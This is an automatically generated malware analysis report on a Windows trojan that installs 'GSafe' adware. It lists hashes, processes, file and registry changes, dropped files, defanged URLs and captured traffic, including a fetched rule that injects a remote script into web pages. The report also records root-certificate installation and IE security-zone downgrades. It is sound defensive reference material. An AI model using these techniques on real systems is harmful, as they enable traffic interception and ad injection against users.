Trojan.Win32.Delphi_b6f079be12

by malwarelabrobot on January 1st, 2015 in Malware Descriptions.

Trojan.Win32.Delphi.FD, Trojan.Win32.Sasfis.FD, VirTool.Win32.DelfInject.FD, mzpefinder_pcap_file.YR (Lavasoft MAS)
Behaviour: Trojan, VirTool


The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.


MD5: b6f079be120993d11a08a472b4e42c9d
SHA1: 87a9b9d5ba403571e0b5f118d1d40b5622516757
SHA256: d27673e5a6b4e58f900786526bb49290148c6cccdb9dc030cf867822fe97be9d
SSDeep: 768:s1cVhpQI2EQK0iPDh84nScF15GYbWjXO3XJV552/K alin2eFzbng2ask84h:KQpQ5EP0ijnRTXJV5k/K Yi2eFfgb84h
Size: 51976 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2009-12-06 00:50:46
Analyzed on: WindowsXPESX SP3 32-bit


Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

No specific payload has been found.

Process activity

The Trojan creates the following process(es):

nj_update.exe:1544
GSafe.exe:832
GSafe.exe:1596
net1.exe:540
net1.exe:440
net1.exe:1100
net.exe:1236
net.exe:484
net.exe:240
%original file name%.exe:1244
gsafe_setup.exe:1800

The Trojan injects its code into the following process(es):

GSafe.exe:1268

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process nj_update.exe:1544 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%WinDir%\Temp\nsx85.tmp (1568 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (4 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\nsh84.tmp (0 bytes)
%WinDir%\Temp\nsx86.tmp\UserInfo.dll (0 bytes)
%WinDir%\Temp\nsx86.tmp (0 bytes)

The process GSafe.exe:832 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\OFK7QZUX\update[1].php (44 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1] (22973 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.pvk (1 bytes)
%WinDir%\Temp\P_CheckUpdate.txt (44 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)
%WinDir%\Temp\GSafe\SSL\GSafe Intermediate SSL.cer (782 bytes)
%WinDir%\Temp\nj_update.exe (18319 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_CheckUpdate.txt (0 bytes)
%WinDir%\Temp\P_RuleList.txt (0 bytes)

The process GSafe.exe:1268 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\812Z098J\hdtv_rules[1].htm (80 bytes)
%WinDir%\Temp\P_RuleList.txt (80 bytes)

The Trojan deletes the following file(s):

%WinDir%\Temp\P_RuleList.txt (0 bytes)
%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\QLSNQ10Z\hdtv_rules[1].htm (0 bytes)

The process %original file name%.exe:1244 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\gsafe_setup.exe (135314 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nst7E.tmp (30 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\KDP3RRYS\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\2VMDU78I\desktop.ini (67 bytes)
%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Y9G7U7CL\desktop.ini (67 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd7D.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy7F.tmp\inetc.dll (0 bytes)

The process gsafe_setup.exe:1800 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (5 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (784 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (3616 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (6360 bytes)
%System%\drivers\gfilterdrv.sys (55 bytes)
%Program Files%\GSafe\remove_GSafe.exe (1568 bytes)
%Program Files%\GSafe\ProtocolFilters.dll (12024 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (69 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (6 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsy81.tmp (81025 bytes)
%Program Files%\GSafe\nfregdrv.exe (1552 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (12536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (23936 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (782 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (784 bytes)
%Program Files%\GSafe\ssleay32.dll (12088 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (11 bytes)
%Program Files%\GSafe\gfilterdrv.sys (1856 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (4 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (6 bytes)
%Program Files%\GSafe\nfapi.dll (3312 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (1856 bytes)
%Program Files%\GSafe\libeay32.dll (35507 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (12536 bytes)
%Program Files%\GSafe\GSafe.exe (15536 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (3312 bytes)

The Trojan deletes the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SelfDel.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\UserInfo.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plc4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\smime3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nspr4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nsd80.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import.bat (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\System.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\nss3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\mozcrt19.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\GSafeSSL.cer (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\plds4.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\ns83.tmp (0 bytes)
%Program Files%\GSafe\gfilterdrv.sys (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\import_root_cert.exe (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\nsExec.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\nso82.tmp\SimpleSC.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\softokn3.dll (0 bytes)
%Documents and Settings%\%current user%\Local Settings\Temp\GSafe\SSL\nss\certutil.exe (0 bytes)

Registry activity

The process nj_update.exe:1544 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "22 1B 5D 50 F7 21 67 4E 69 17 52 91 DD 15 22 8F"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayVersion" = "1.1.0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\C]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GSafe]
"Version" = "1.1.0"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\D]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\F]
"BaseClass" = "Drive"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\A]
"BaseClass" = "Drive"

The process GSafe.exe:832 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\GSafe]
"instid" = "2rLVemqiV8QPrfThkbebR75aYB35Y4gu"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 03 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\System\CurrentControlSet\Services\gfilterdrv]
"Tag" = "9"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\A6FBE8F491681C4D381A094958E89BD8A84108E2]
"Blob" = "03 00 00 00 01 00 00 00 14 00 00 00 A6 FB E8 F4"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\System\CurrentControlSet\Control\GroupOrderList]
"PNP_TDI" = "08 00 00 00 05 00 00 00 01 00 00 00 02 00 00 00"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EA 3E 31 84 2A 84 10 E2 5C 3C 59 C1 19 5B B9 F8"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"

[HKLM\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates]
"A6FBE8F491681C4D381A094958E89BD8A84108E2"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"

The process GSafe.exe:1596 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6B A6 24 78 3F FD BB 27 9D D7 0A B8 EC 4A 3E 28"

The process GSafe.exe:1268 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "12 44 6E 90 B5 D5 96 9C 44 4B 23 98 59 DA 4D 8A"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\LocalService\Cookies"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 04 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\LocalService\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\LocalService\Local Settings\Temporary Internet Files"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:

"UNCAsIntranet" = "1"

Proxy settings are disabled:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan deletes the following value(s) in system registry:

[HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyOverride"
"AutoConfigURL"
"ProxyServer"

The process net1.exe:540 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EC BA DB 8A F7 0E 7E 45 9D E7 10 84 79 54 4A EA"

The process net1.exe:440 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "62 C8 CA 09 CA 0A D2 11 29 49 83 10 EA 71 6F A3"

The process net1.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "25 85 54 67 57 69 7F 8E FE 87 C2 69 62 93 D2 E6"

The process net.exe:1236 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "64 8E 98 A6 22 0C 5D 90 AF 0E 8C 98 F3 F9 BF 43"

The process net.exe:484 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "29 93 6B 55 C5 52 13 64 11 F7 B9 89 0D 3B 81 68"

The process net.exe:240 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "FC 2E FC B6 45 6C 20 A9 C0 64 F1 E2 42 4B 52 62"

The process %original file name%.exe:1244 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 16 00 00 00 01 00 00 00 00 00 00 00"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "43 1E C6 BC 65 07 AD 98 6E B1 42 6D E4 D1 CF 96"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

The Trojan modifies IE security zone settings so that all local web nodes whose names contain no dots and are not assigned to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE security zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE security zone settings so that all URLs are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

The process gsafe_setup.exe:1800 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "2D D2 52 06 9D 60 9E 76 4B B4 AE 11 6C 9D 56 48"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\GSafe]
"affid" = "hdtv"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Comments" = "Browse safe, securely and do your best searches online"
"UninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"
"DisplayVersion" = "1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"DisplayName" = "GSafe"
"QuietUninstallString" = "%Program Files%\GSafe\remove_GSafe.exe /S"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\GSafe]
"Publisher" = "GENCO LABS LLC"

[HKLM\SOFTWARE\GSafe]
"Version" = "1.0.0"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

Dropped PE files

MD5 File path
0661995db9d56791723702f4ea94c5fb c:\Documents and Settings\LocalService\Local Settings\Temporary Internet Files\Content.IE5\SRKX8H05\gsafe_update[1]
3a0c5503294cd43c59df4279d2b72d8d c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4X6BKH23\gsafe_setup[1].exe
1690feeae024a4584ea1d97c07dee78e c:\Program Files\GSafe\GSafe.exe
9155cce4d8c0daf7b4d4c1ada945ce54 c:\Program Files\GSafe\ProtocolFilters.dll
3e1176c39139baf084e9a69d6d50438a c:\Program Files\GSafe\libeay32.dll
9ff0b75dfb43d58f9d2ebe2697b529c4 c:\Program Files\GSafe\nfapi.dll
92a6df47283b49b207045fa7a4502bc1 c:\Program Files\GSafe\nfregdrv.exe
bd67f6e7a304f684b3513b3a9c535143 c:\Program Files\GSafe\remove_GSafe.exe
4fbf0e0dd471ce2945c33c14e14269ff c:\Program Files\GSafe\ssleay32.dll
0661995db9d56791723702f4ea94c5fb c:\WINDOWS\Temp\nj_update.exe
a4b60de83b790c9aa86a367eedc3af2a c:\WINDOWS\system32\drivers\gfilterdrv.sys

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name Virtual Address Virtual Size Raw Size Entropy Section MD5
.text 4096 23130 23552 4.44841 0bc2ffd32265a08d72b795b18265828d
.rdata 28672 4496 4608 3.59163 f179218a059068529bdb4637ef5fa28e
.data 36864 110488 1024 3.26405 975304d6dd6c4a4f076b15511e2bbbc0
.ndata 147456 32768 0 0 d41d8cd98f00b204e9800998ecf8427e
.rsrc 180224 2536 2560 3.13573 e844fdd69bdbb3983f3935842639207a

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 111

URLs

URL IP
hxxp://www.gencolabsllc.com/services/hdtv_rules.php
hxxp://www.gencolabsllc.com/services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404
hxxp://www.gencolabsllc.com/bin/gsafe_update.exe?dummy=573
hxxp://gencolabsllc.com/bin/gsafe_update.exe?dummy=573


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /services/update.php?affid=hdtv&v=1.0.0&key=2rLVemqiV8QPrfThkbebR75aYB35Y4gu&dummy=404 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:25 GMT
Content-Type: text/plain
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
hXXp://gencolabsllc.com/bin/gsafe_update.exe..


GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:24 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js
"></script></head>...


GET /services/hdtv_rules.php HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.gencolabsllc.com
Connection: Keep-Alive


HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Wed, 31 Dec 2014 11:01:44 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.5.15
P3P: CP="Potato"
X-Cache: BYPASS
</head>|<script src="hXXps://gsafejs.me/services/hdtv/hdtv.js
"></script></head>...


